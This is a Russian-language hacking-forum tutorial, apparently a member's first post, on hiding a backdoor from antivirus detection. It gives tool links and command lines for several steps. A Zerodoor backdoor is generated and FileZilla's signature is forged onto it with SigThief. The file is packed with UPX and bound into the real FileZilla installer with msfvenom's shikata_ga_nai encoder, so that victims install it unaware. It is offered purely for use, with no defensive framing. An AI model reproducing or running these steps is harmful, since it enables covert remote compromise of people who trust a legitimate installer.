Прячем свой Бэкдор
@webware
Введение
Всем привет, на форуме появился не давно. Читая статьи всегда хотелось взять и самому что-то написать. И конечно как и многие из нас (форумчан) хочется попась в Grey и выше, а что бы туда попасть надо писать свои статьи. Что я сегодня и решил сделать. В течении 3 дней читал, переводил и усваивал информацию о том как спрятать свой плохой хороший код. Да, результат не идеален, но все же
Результат:
Скажу честно это мой лучший результат )
Основная часть
Для всего процесса нам понядобятся :
Zerodoor - https://github.com/Souhardya/Zerodoor
SigThief - https://github.com/secretsquirrel/SigThief
UPX - apt install
upx
msfvenom
Сам процесс
( как установить объяснять не буду, с этим проблем возникнуть не должно ; )
Создаем бэкдор в Zerodoor. Заходим в репозиторий тулзы и запускаем
Запуск:
Запустили программу и выбираем нужные пункты :
тут ваш ip , что бы узнать ip вводим ifconfig
Все мы создали бэкдор и теперь надо его сделать почти чистым )
Для этого первым делом подделеам подпись. У нашего только что созданного бекдора не будет никакой подписи, а вот в официальных программах она есть. Я буду использовать подпись установочного файла FileZilla. Чтобы проверить наличие подписи даем команду :
Видим наличие подписи и это то что нам нужно )
Теперь нам нужно приделать эту подпись нашему файлу
python sigthief.py -i /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -t /opt/Zerodoor/backdoor.exe -o /opt/payload/windowsproga.exe -i - путь до файла с подписью -t - путь до нашего файла -o - путь до нашего будующего файла
Все подпись подделана. Теперь сожмем файл спомощью UPX
upx -5 /путь до файла
Все программа сжата, отлично ) Теперь было бы хорошо что бы наш виндовспрога не вызывал подозрений для этого мы соеденим его с установшиком FileZilla
msfvenom -a x86 --platform Windows -e x86/shikata_ga_nai --format=exe -x /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -o /opt/payload/payload/windowsproga.exe -k 5
Эта была моя первая статья на форуме, всем спасибо, жду вашей реакции)